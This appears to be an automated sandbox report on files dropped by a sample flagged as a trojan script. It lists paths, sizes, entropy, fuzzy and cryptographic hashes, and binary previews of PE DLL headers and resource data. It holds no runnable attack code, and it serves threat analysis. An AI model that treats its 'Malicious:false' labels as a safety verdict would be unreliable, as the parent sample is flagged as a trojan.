                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ................p.....................................................`A........................................x.......e-..(.......x........B..............$...4...........................(...@1..8............0...............................text...E........................... ..`.rdata..,....0......................@..@.data....K....... ..................@....pdata...B.......D..................@..@.00cfg..(....`......................@..@.gxfg...0$...p...&..................@..@.retplne\............4...................tls....!............6..............@....voltbl.8............8.................._RDATA...............:..............@..@.rsrc...x............<..............@..@.reloc..$............B..............@..B........................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):7514112
                                                                    Entropy (8bit):6.462467169487978
                                                                    Encrypted:false
                                                                    SSDEEP:98304:BuT3g23jeZ/02YPuLaw5RoD1rfEQ3CPdOEabcgsOMdi:BuDPTwLap14QzEijsvi
                                                                    MD5:A5F1921E6DCDE9EAF42E2CCC82B3D353
                                                                    SHA1:1F6F4DF99AE475ACEC4A7D3910BADB26C15919D1
                                                                    SHA-256:50C4DC73D69B6C0189EAB56D27470EE15F99BBBC12BFD87EBE9963A7F9BA404E
                                                                    SHA-512:0C24AE7D75404ADF8682868D0EBF05F02BBF603F7DDD177CF2AF5726802D0A5AFCF539DC5D68E10DAB3FCFBA58903871C9C81054560CF08799AF1CC88F33C702
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......X..........L.......................................s...........`A..........................................j.....N.j.d.....r.......o.PJ............r.....$.i.......................i.(.....X.8...........P.k.......j.@....................text.....X.......X................. ..`.rdata........X.......X.............@..@.data.........k..|....k.............@....pdata..PJ....o..L...No.............@..@.00cfg..(....0r.......q.............@..@.gxfg...p*...@r..,....q.............@..@.retplne\....pr.......q..................tls....:.....r.......q.............@....voltbl.D.....r.......q................._RDATA........r.......q.............@..@.rsrc.........r.......q.............@..@.reloc........r.......q.............@..B........................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):362355
                                                                    Entropy (8bit):5.4138809970208035
                                                                    Encrypted:false
                                                                    SSDEEP:6144:j54QCpN9/WiHIR9a5D4+kQMGSB+jC6kAw1TUKKpg3b9xIsVxSt2y5qP3ux5tPwDV:F9CpN9OiHIRX+HMT+jC6kAw1TYpg3b9P
                                                                    MD5:464E5EEABA5EFF8BC93995BA2CB2D73F
                                                                    SHA1:3B216E0C5246C874AD0AD7D3E1636384DAD2255D
                                                                    SHA-256:0AD547BB1DC57907ADEB02E1BE3017CCE78F6E60B8B39395FE0E8B62285797A1
                                                                    SHA-512:726D6C41A9DBF1F5F2EFF5B503AB68D879B088B801832C13FBA7EB853302B16118CACDA4748A4144AF0F396074449245A42B2FE240429B1AFCB7197FA0CB6D41
                                                                    Malicious:false
                                                                    Preview:..........].h.(...i.0...j.<...k.K...l.V...n.^...o.c...p.p...r.v...s.....t.....v.....w.....y.....z.....|.....}................................................................... .....M.....Z.....i.....z...........................................................!.....4.....T.....[.....k.....{...........................................................$.....4.....B.....x.............................................................................2.....K.....g.....u.....}........................................................... .....0.....L.....a.......................................................................9.....N.....g.....n.....q.....r.....~.........................................D.....L.......................................................................'.....<.....^.....q................................................... .....".....%.D...(.`...*.....+.....,.........../.....0.....1.....3.....4.+...5.F...6.....7.....8.....9.....<.....=.....>.....?.....@.....A.8...C.`...D.g.
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):583572
                                                                    Entropy (8bit):4.947180410657857
                                                                    Encrypted:false
                                                                    SSDEEP:12288:QqhqEuPxT8xZTtWosuF9Q5m9yAAVzfukCQox30jH8+I:Zh8T8xTWoZF9Q5m9yAAVzXCQ0
                                                                    MD5:2C933F084D960F8094E24BEE73FA826C
                                                                    SHA1:91DFDDC2CFF764275872149D454A8397A1A20AB1
                                                                    SHA-256:FA1E44215BD5ACC7342C431A3B1FDDB6E8B6B02220B4599167F7D77A29F54450
                                                                    SHA-512:3C9ECFB0407DE2AA6585F4865AD54EEB2EC6519C9D346E2D33ED0E30BE6CC3EBFED676A08637D42C2CA8FA6CFEFB4091FEB0C922FF71F09A2B89CDD488789774
                                                                    Malicious:false
                                                                    Preview:..........Q.h.@...i.K...j.W...k.f...l.q...n.y...o.~...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................&.....-.....4.....5.....6.....;.....g........................................./.....7.....|...............................................A.....a.....q............................./.....R.....d.....m.............................4.....@.....O.....e...............................................I.....{............................................... .....3.....h.....w.............................:.....R.............................).....H.....n.....q.......................'.....G.....p.....w.....z.....{.........................................l.................".....B....._.....................................................;.....c.................).....u....................................... .....".0...%.f...(.....*.....+.....,.........../.....0.1...1.....3.....4.....5.....6.{...7.....8.....9.....;.....<.....=.5...>.o...?.y...@.....A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):639744
                                                                    Entropy (8bit):4.950537001099058
                                                                    Encrypted:false
                                                                    SSDEEP:12288:K+sgtqIj5/XvYUtOkQIkqBJ5SNbW+eTtvZEMgSENjM:KD4Fek75z+K
                                                                    MD5:FDBAD4C84AC66EE78A5C8DD16D259C43
                                                                    SHA1:3CE3CD751BB947B19D004BD6916B67E8DB5017AC
                                                                    SHA-256:A62B848A002474A8EA37891E148CBAF4AF09BDBA7DAFEBDC0770C9A9651F7E3B
                                                                    SHA-512:376519C5C2E42D21ACEDB1EF47184691A2F286332451D5B8D6AAC45713861F07C852FB93BD9470FF5EE017D6004ABA097020580F1BA253A5295AC1851F281E13
                                                                    Malicious:false
                                                                    Preview:........~.z.h.....i.....j.....k.....l.....n.'...o.,...p.9...r.?...s.P...t.Y...v.n...w.{...y.....z.....|.....}...................................................................).....B....._.........................................-....._.....b.....f.........................................0.....G...................................................../.....O...............................................-.....7.....g.............................5.....`...............................................K.....[.....r.............................a.........................................".....=.....\.....w.................................................................V.......................o.............................<.....Y.....i.....q.....}.......................<.....^.........................................<.....M... ._...".|...%.....(.....*.M...+.P...,.n........./.....0.....1.....3.....4.=...5.d...6.....7.....8.....9.6...;.Q...<.r...=.....>.....?.....@.....A.....C.....D.....E.Y...F...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):667826
                                                                    Entropy (8bit):4.715111408941832
                                                                    Encrypted:false
                                                                    SSDEEP:12288:MMq8w2kMLlYrdAs1aQUx41aVVwslMLOmFOMw35uKN31tfbDMxbV2Jfu64Kjz5fS+:MMqckulYrdAs1aQUmBsmRw35uK7Jgxho
                                                                    MD5:38BCABB6A0072B3A5F8B86B693EB545D
                                                                    SHA1:D36C8549FE0F69D05FFDAFFA427D3DDF68DD6D89
                                                                    SHA-256:898621731AC3471A41F8B3A7BF52E7F776E8928652B37154BC7C1299F1FD92E1
                                                                    SHA-512:002ADBDC17B6013BECC4909DAF2FEBB74CE88733C78E968938B792A52C9C5A62834617F606E4CB3774AE2DAD9758D2B8678D7764BB6DCFE468881F1107DB13EF
                                                                    Malicious:false
                                                                    Preview:..........S.h.<...i.D...j.P...k._...l.j...n.r...o.w...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................&.....-.........../.....4.........................................:.....F.....P.........................................Q.....]...................................,.....V.........................................7...................................9.....?.....M.....a.......................9.....i.........................................(.....N.....x.......................=.....X.....n.......................Z.....s...................................8.....h.......................+.....2.....5.....6.....J.....`.....|.................(...........B.....N.................>...................................,.....6.....j.................7.....s.................?.....Q.....g..................... .....".....%.U...(.....*.....+.....,....... .../.N...0.W...1.....3.....4.....5.N...6.....7.....8.....9.@...;.m...<.....=.....>.....?.....@.....A.D...C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):858553
                                                                    Entropy (8bit):4.32277927640417
                                                                    Encrypted:false
                                                                    SSDEEP:3072:6gGTLRFbMdhBVHvr5eSnC6PRWhk7Bbd8+D95H0XluZ:YWBlvr5FCYRWuBbdB5wl2
                                                                    MD5:9340520696E7CB3C2495A78893E50ADD
                                                                    SHA1:EED5AEEF46131E4C70CD578177C527B656D08586
                                                                    SHA-256:1EA245646A4B4386606F03C8A3916A3607E2ADBBC88F000976BE36DB410A1E39
                                                                    SHA-512:62507685D5542CFCD394080917B3A92CA197112FEEA9C2DDC1DFC77382A174C7DDF758D85AF66CD322692215CB0402865B2A2B212694A36DA6B592028CAAFCDF
                                                                    Malicious:false
                                                                    Preview:..........].h.(...i.9...j.E...k.T...l._...n.g...o.m...p.z...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................!.....(.....).....*...../.......................9.....K.....g.............................R.....T.....X.......................&.....[.............................E.....x.......................-.....O.....}.................e.....t.........................................5.....q.................2.....r.........................................-.....I.......................x...............................................@.....r.............................5.....c...............................................6.....M.....n.................1.....I.......................f.........................................@.................i...............................................J.....h... .}...".....%.....(.P...*.....,.........../.....0.....1.....3.....4.....5.^...6.....7.....8.u...9.....;.....<.....=.....>.R...?.e...@.....A.....C.c...D...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):409695
                                                                    Entropy (8bit):5.417085582145732
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bgoRVrijIs3cejEYBCqS4o3nbhjJSwHQliEwfwVEMXdLbpuQ16BtryBiGIle3nei:b3GQUwJAMNTCypxB5WMml
                                                                    MD5:4CD6B3A91669DDCFCC9EEF9B679AB65C
                                                                    SHA1:43C41CB00067DE68D24F72E0F5C77D3B50B71F83
                                                                    SHA-256:56EFFF228EE3E112357D6121B2256A2C3ACD718769C89413DE82C9D4305459C6
                                                                    SHA-512:699BE9962D8AAE241ABD1D1F35CD8468FFBD6157BCD6BDF2C599D902768351B247BAAD6145B9826D87271FD4A19744EB11BF7065DB7FEFB01D66D2F1F39015A9
                                                                    Malicious:false
                                                                    Preview:..........R.h.>...i.F...j.R...k.a...l.l...n.t...o.y...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................!.....(...../.....0.....1.....3.....\.....v...............................................&.....D.....F.....J.....r.....................................................%.....5.....S.....n.....q.....{.........................................%.....5.....8.....;.....D.....X.....n.....................................................#.....5.....D.....U.....k.....r...................................'.....H.....Q.....b.....u.....................................................).....0.....3.....4.....=.....F.....N.....T.....f.................,.....4.....o.........................................$...../.....4.....J.....t.............................%.....>.....C.....M.....^.....z......... .....".....%.....(.....*.....+.....,.&.....P.../.m...0.r...1.....3.....4.....5.....6.1...7.B...8.V...9.h...;.v...<.....=.....>.....?.....@.....A.....C.....D.&...E.Z.
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):419829
                                                                    Entropy (8bit):5.845882900283008
                                                                    Encrypted:false
                                                                    SSDEEP:6144:RquUIAMYOnQYeAIV4g558YwGKNDsku8Qy:Rq/IA5On504g558YwbNDsC
                                                                    MD5:EEEE212072EA6589660C9EB216855318
                                                                    SHA1:D50F9E6CA528725CED8AC186072174B99B48EA05
                                                                    SHA-256:DE92F14480770401E39E22DCF3DD36DE5AD3ED22E44584C31C37CD99E71C4A43
                                                                    SHA-512:EA068186A2E611FB98B9580F2C5BA6FD1F31B532E021EF9669E068150C27DEEE3D60FD9FF7567B9EB5D0F98926B24DEFABC9B64675B49E02A6F10E71BB714AC8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):380107
                                                                    Entropy (8bit):5.46366244634788
                                                                    Encrypted:false
                                                                    SSDEEP:6144:czP4qlrn8+ua0swlGVJJwoXlw5CvET5VTrBGzO7iJyd4tTWwT:dqlr89JklwH55rETL
                                                                    MD5:E7BA94C827C2B04E925A76CB5BDD262C
                                                                    SHA1:ABBA6C7FCEC8B6C396A6374331993C8502C80F91
                                                                    SHA-256:D8DA7AB28992C8299484BC116641E19B448C20ADF6A8B187383E2DBA5CD29A0B
                                                                    SHA-512:1F44FCE789CF41FD62F4D387B7B8C9D80F1E391EDD2C8C901714DD0A6E3AF32266E9D3C915C15AD47C95ECE4C7D627AA7339F33EEA838D1AF9901E48EDB0187E
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):406584
                                                                    Entropy (8bit):5.519300999448185
                                                                    Encrypted:false
                                                                    SSDEEP:6144:V3JEmQ1hqVK+6aU8WUmzg3ELWzhqY305QgfXlIsCJd:V5t6sKXaK/LWy5POsCJd
                                                                    MD5:CF22EC11A33BE744A61F7DE1A1E4514F
                                                                    SHA1:73E84848C6D9F1A2ABE62020EB8C6797E4C49B36
                                                                    SHA-256:7CC213E2C9A2D2E2E463083DD030B86DA6BBA545D5CEE4C04DF8F80F9A01A641
                                                                    SHA-512:C10C8446E3041D7C0195DA184A53CFBD58288C06EAF8885546D2D188B59667C270D647FA7259F5CE140EC6400031A7FC060D0F2348AB627485E2207569154495
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):729549
                                                                    Entropy (8bit):4.799528683257041
                                                                    Encrypted:false
                                                                    SSDEEP:12288:AQbueXYquNw2202pgtZBAujt4NIbsJvaP5A3HRsgQiEYQ3C1gf2ns4CfFnx1Xu2v:B2quNw2202pgtHAujmNrJvaRA3HRsDik
                                                                    MD5:E66A75680F21CE281995F37099045714
                                                                    SHA1:D553E80658EE1EEA5B0912DB1ECC4E27B0ED4790
                                                                    SHA-256:21D1D273124648A435674C7877A98110D997CF6992469C431FE502BBCC02641F
                                                                    SHA-512:D3757529DD85EF7989D9D4CECF3F7D87C9EB4BEDA965D8E2C87EE23B8BAAEC3FDFF41FD53BA839215A37404B17B8FE2586B123557F09D201B13C7736C736B096
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):331921
                                                                    Entropy (8bit):5.529632303060999
                                                                    Encrypted:false
                                                                    SSDEEP:6144:k6QL0f35ubiwMP9egutWbfaYX2YBB5HXSdBruC:6LduwMetW92M53SuC
                                                                    MD5:825ED4C70C942939FFB94E77A4593903
                                                                    SHA1:7A3FAEE9BF4C915B0F116CB90CEC961DDA770468
                                                                    SHA-256:E11E8DB78AE12F8D735632BA9FD078EC66C83529CB1FD86A31AB401F6F833C16
                                                                    SHA-512:41325BEC22AF2E5EF8E9B26C48F2DFC95763A249CCB00E608B7096EC6236AB9A955DE7E2340FD9379D09AC2234AEE69AED2A24FE49382FFD48742D72A929C56A
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):334693
                                                                    Entropy (8bit):5.521172766448584
                                                                    Encrypted:false
                                                                    SSDEEP:6144:Mvneu710gxhmrunGeuMP9eczCPMfaYbg3In5N+Sqn8BcwS:Ml0gxvNuMbCPmgA5YSNcwS
                                                                    MD5:19D18F8181A4201D542C7195B1E9FF81
                                                                    SHA1:7DEBD3CF27BBE200C6A90B34ADACB7394CB5929C
                                                                    SHA-256:1D20E626444759C2B72AA6E998F14A032408D2B32F957C12EC3ABD52831338FB
                                                                    SHA-512:AF07E1B08BBF2DD032A5A51A88EE2923650955873753629A086CAD3B1600CE66CA7F9ED31B8CA901C126C10216877B24E123144BB0048F2A1E7757719AAE73F2
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):404903
                                                                    Entropy (8bit):5.392122812912978
                                                                    Encrypted:false
                                                                    SSDEEP:3072:75rkwZKG5KJo0ZyFPK9zj4rMY4rjyujd8pyPWncpwwfNEOv553l50GLFddhRIHKj:t1K2YZIK9BYgapFGl5dLFddA7Fcp
                                                                    MD5:7DA3E8AA47BA35D014E1D2A32982A5BB
                                                                    SHA1:8E35320B16305AD9F16CB0F4C881A89818CD75BB
                                                                    SHA-256:7F85673CF80D1E80ACFC94FB7568A8C63DE79A13A1BB6B9D825B7E9F338EF17C
                                                                    SHA-512:1FCA90888EB067972BCCF74DD5D09BB3FCE2CEB153589495088D5056ED4BDEDE15D54318AF013C2460F0E8B5B1A5C6484ADF0ED84F4B0B3C93130B086DA5C3BF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):404348
                                                                    Entropy (8bit):5.362527979144936
                                                                    Encrypted:false
                                                                    SSDEEP:6144:/Q0DA42b4XUx+SCHgfUcp9Ch48BKjbu5mrj7o2oxjm6PZqJ:YK2b40P9pchXgjbu5mrroNSJ
                                                                    MD5:04A9BA7316DC81766098E238A667DE87
                                                                    SHA1:24D7EB4388ECDFECADA59C6A791C754181D114DE
                                                                    SHA-256:7FA148369C64BC59C2832D617357879B095357FE970BAB9E0042175C9BA7CB03
                                                                    SHA-512:650856B6187DF41A50F9BED29681C19B4502DE6AF8177B47BAD0BF12E86A25E92AA728311310C28041A18E4D9F48EF66D5AD5D977B6662C44B49BFD1DA84522B
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):365447
                                                                    Entropy (8bit):5.471951090286899
                                                                    Encrypted:false
                                                                    SSDEEP:6144:U/RGRpph+2n4x6i05L9H4h+JbT/R/WiMMn5bjN43qcLQ6PQX:8R6pHnpcmzn5bjh
                                                                    MD5:CCC71F88984A7788C8D01ADD2252D019
                                                                    SHA1:6A87752EAC3044792A93599428F31D25DEBEA369
                                                                    SHA-256:D69489A723B304E305CB1767E6C8DA5D5D1D237E50F6DDC76E941DCB01684944
                                                                    SHA-512:D35CCD639F2C199862E178A9FAB768D7DB10D5A654BC3BC1FAB45D00CEB35A01119A5B4D199E2DB3C3576F512B108F4A1DF7FAF6624D961C0FC4BCA5AF5F0E07
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):591476
                                                                    Entropy (8bit):5.080621083768775
                                                                    Encrypted:false
                                                                    SSDEEP:12288:HniDys0XVX9nuyaXTfwIDwNUWGOGfStQvjy1feKtDmrwMTAKzIxRAQiHedNu36Xp:HneM3uyaXTfwewNUWGOGfStQvjy1feKn
                                                                    MD5:2E37FD4E23A1707A1ECCEA3264508DFF
                                                                    SHA1:E00E58ED06584B19B18E9D28B1D52DBFC36D70F3
                                                                    SHA-256:B9EE861E1BDECFFE6A197067905279EA77C180844A793F882C42F2B70541E25E
                                                                    SHA-512:7C467F434EB0CE8E4A851761AE9BD7A9E292AAB48E8E653E996F8CA598D0EB5E07EC34E2B23E544F3B38439DC3B8E3F7A0DFD6A8E28169AA95CEFF42BF534366
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):374471
                                                                    Entropy (8bit):5.4357475905490436
                                                                    Encrypted:false
                                                                    SSDEEP:6144:sMeOXrZx5SkDbhCwx+sk/bOE/BanTLLE5lJucHcEJ18OWUczfSUWcX1wR2:snAr15wRBaA5lJxHcEJ18OWUII2
                                                                    MD5:21E534869B90411B4F9EA9120FFB71C8
                                                                    SHA1:CC91FFBD19157189E44172392B2752C5F73984C5
                                                                    SHA-256:2D337924139FFE77804D2742EDA8E58D4E548E65349F827840368E43D567810B
                                                                    SHA-512:3CA3C0ADAF743F92277452B7BD82DB4CF3F347DE5568A20379D8C9364FF122713BEFD547FBD3096505EC293AE6771ADA4CD3DADAC93CC686129B9E5AACF363BD
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):419886
                                                                    Entropy (8bit):5.213443304857257
                                                                    Encrypted:false
                                                                    SSDEEP:6144:BnI+f5Qm2xaVyEDQftIK9bSNxeFXGvZ3Omy5GzmHYFAk1s8:C+f541e+b4xy5ym8
                                                                    MD5:D7DF2EA381F37D6C92E4F18290C6FFE0
                                                                    SHA1:7CACF08455AA7D68259FCBA647EE3D9AE4C7C5E4
                                                                    SHA-256:DB4A63FA0D5B2BABA71D4BA0923CAED540099DB6B1D024A0D48C3BE10C9EED5A
                                                                    SHA-512:96FC028455F1CEA067B3A3DD99D88A19A271144D73DFF352A3E08B57338E513500925787F33495CD744FE4122DFF2D2EE56E60932FC02E04FEED2EC1E0C3533F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):436450
                                                                    Entropy (8bit):5.4004782148030905
                                                                    Encrypted:false
                                                                    SSDEEP:12288:LKi1uIt6QuagV1ZzosmZ7MYnYV1S3Bb5MxlqE0wC5wZLljHnkH0oR5FEu64JGV7h:qVVQ515CF
                                                                    MD5:3EE48A860ECF45BAFA63C9284DFD63E2
                                                                    SHA1:1CB51D14964F4DCED8DEA883BF9C4B84A78F8EB6
                                                                    SHA-256:1923E0EDF1EF6935A4A718E3E2FC9A0A541EA0B4F3B27553802308F9FD4FC807
                                                                    SHA-512:EB6105FACA13C191FEF0C51C651A406B1DA66326BB5705615770135D834E58DEE9BED82AA36F2DFB0FE020E695C192C224EC76BB5C21A1C716E5F26DFE02F763
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):832533
                                                                    Entropy (8bit):4.370164270379204
                                                                    Encrypted:false
                                                                    SSDEEP:3072:RqlNvTn1Pdm06M0ITsKMaWZKerbtsMhmksd4Mqz2sQmB51jvjsWnhAgfZw/g/I/f:RuN7n1VQFLFwsL5cqhgrA8
                                                                    MD5:308619D65B677D99F48B74CCFE060567
                                                                    SHA1:9F834DF93FD48F4FB4CA30C4058E23288CF7D35E
                                                                    SHA-256:E40EE4F24839F9E20B48D057BF3216BC58542C2E27CB40B9D2F3F8A1EA5BFBB4
                                                                    SHA-512:3CA84AD71F00B9F7CC61F3906C51B263F18453FCE11EC6C7F9EDFE2C7D215E3550C336E892BD240A68A6815AF599CC20D60203294F14ADB133145CA01FE4608F
                                                                    Malicious:false
                                                                    Preview:..........T.h.:...i.T...j.`...k.o...l.z...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}......................... .....(...../.....6.....=.....>.....?.....D.......................0.....E.....[.......................+.....c.....e.....q.......................8.....p...................................Q...................................<.....X.................%.....>.....c...................................*.....U.......................w...............................................g.....v.......................Q.................D.............................%.....O.....R.....r.............................+.....2.....5.....7.....P.....i.......................H...........\.....~...........S.................%.....E.....N.....o.....{.......................O.................;.......................*.....M.....o......... .....".....%.....(.Y...*.....+.....,.........../.1...0.Y...1.....3.....4.....5.;...6.....7.....8.,...9.T...;.....<.....=.....>.....?.....@.0...A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):519468
                                                                    Entropy (8bit):4.6902065244805256
                                                                    Encrypted:false
                                                                    SSDEEP:12288:iDIJk5rUp/mTLa2/ANNqOL607Af6XVjeQCapb1527oFpMbe54lmdADnwg5Qgx:7205KoM
                                                                    MD5:FC84EA7DC7B9408D1EEA11BEEB72B296
                                                                    SHA1:DE9118194952C2D9F614F8E0868FB273DDFAC255
                                                                    SHA-256:15951767DAFA7BDBEDAC803D842686820DE9C6DF478416F34C476209B19D2D8C
                                                                    SHA-512:49D13976DDDB6A58C6FDCD9588E243D705D99DC1325C1D9E411A1D68D8EE47314DFCB661D36E2C4963C249A1542F95715F658427810AFCABDF9253AA27EB3B24
                                                                    Malicious:false
                                                                    Preview:........|.|.h.....i.....j.....k.....l.!...n.)...o.....p.;...r.A...s.R...t.[...v.p...w.}...y.....z.....|.....}.........................................................................8.....O.....h............................................... .....".....&.....N.....j.........................................B.....[.....p...............................................G.....o.....w...............................................).....E.....y.............................$.....,.....3.....?.....V.....r...................................!.....D.....h...................................7.....W.....Z.....m............................................................................./.................e.....o.......................E.....X.....p.....v.........................................@.....Z...................................#.....J.....U... .g...".....%.....(.....*.....+.....,.......#.../.C...0.P...1.....3.....4.....5.....6.9...7.R...8.g...9.{...;.....<.....=.....>.....?.....@.....A.x...C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):868673
                                                                    Entropy (8bit):4.359937106090665
                                                                    Encrypted:false
                                                                    SSDEEP:3072:FugBVdK+X9c+XdfdkhSvf4QAEm5dmGrsUt3GR3GXO7NLdYnLsBPtv83ctKOf4z8d:cuVAsc+NZB5/5MNSD
                                                                    MD5:B5DFCE8E3BA0AEC2721CC1692B0AD698
                                                                    SHA1:C5D6FA21A9BA3D526F3E998E3F627AFB8D1EECF3
                                                                    SHA-256:B1C7FB6909C8A416B513D6DE21EEA0B5A6B13C7F0A94CABD0D9154B5834A5E8B
                                                                    SHA-512:FACF0A9B81AF6BB35D0FC5E69809D5C986A2C91A166E507784BDAD115644B96697FE504B8D70D9BBB06F0C558F746C085D37E385EEF41F0A1C29729D3D97980F
                                                                    Malicious:false
                                                                    Preview:........y...h.....i.....j.....k.....l.....n.#...o.(...p.5...r.;...s.L...t.U...v.j...w.w...y.}...z.....|.....}.........................................................................t...................................A.....d.....~.............................4.....c...................................d.......................l...................................J........... .....9.....H.....p...................................P.......................g.........................................+.....K.......................P.....u.......................l.......................9.....b...................................C.....m...............................................#.....D.................&.....<.................N.................................../.....A.....s...........................................................*.....R.....q... .....".....%.....(.6...*.s...+.v...,.........../.....0.5...1.....3.....4.....5.@...6.....7.....8.:...9._...;.....<.....=.....>.....?.....@.8...A.|...C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):406671
                                                                    Entropy (8bit):5.521226257186607
                                                                    Encrypted:false
                                                                    SSDEEP:3072:z9mYpq0ZkIEZgVRTJ3MOS+WG0uPXbG4TT6WI6DkYAiKbeM/wXbnWNjdmvW0IEifp:zTEgNmW/5tE7IDjG
                                                                    MD5:255F808210DBF995446D10FF436E0946
                                                                    SHA1:1785D3293595F0B13648FB28AEC6936C48EA3111
                                                                    SHA-256:4DF972B7F6D81AA7BDC39E2441310A37F746AE5015146B4E434A878D1244375B
                                                                    SHA-512:8B1A4D487B0782055717B718D58CD21E815B874E2686CDFD2087876B70AE75F9182F783C70BF747CF4CA17A3AFC68517A9DB4C99449FA09BEF658B5E68087F2A
                                                                    Malicious:false
                                                                    Preview:..........<.h.j...i.{...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.*.....2.....7.....?.....G.....O.....V.....].....d.....e.....f.....h...........................................................:.....K.....M.....Q.....y...........................................................-.....D.....T.....Z.....b.....p.......................................................................&.....8.....H.....].....z...........................................................&.....1.....H.....................................................'.....2.....F.....g.....j.....z...................................................................................`.......................;.....W.....p.....................................................6.....N............................................... .....B.....M... .W...".h...%.....(.....*.....+.....,.........../.....0.....1.O...3.a...4.~...5.....6.....7.....8.....9.0...;.>...<.K...=.W...>.l...?.u...@.....A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):437458
                                                                    Entropy (8bit):5.655020135928055
                                                                    Encrypted:false
                                                                    SSDEEP:6144:wxEAuskhSSfm4Cky1tV5z8iZfGRzEY63aQSam7gXOeeeQi5gR7azQtGV52n5ydpS:wxLaj6V5z850+7BwQi5Rn6Z
                                                                    MD5:2AA0A175DF21583A68176742400C6508
                                                                    SHA1:3C25BA31C2B698E0C88E7D01B2CC241F0916E79A
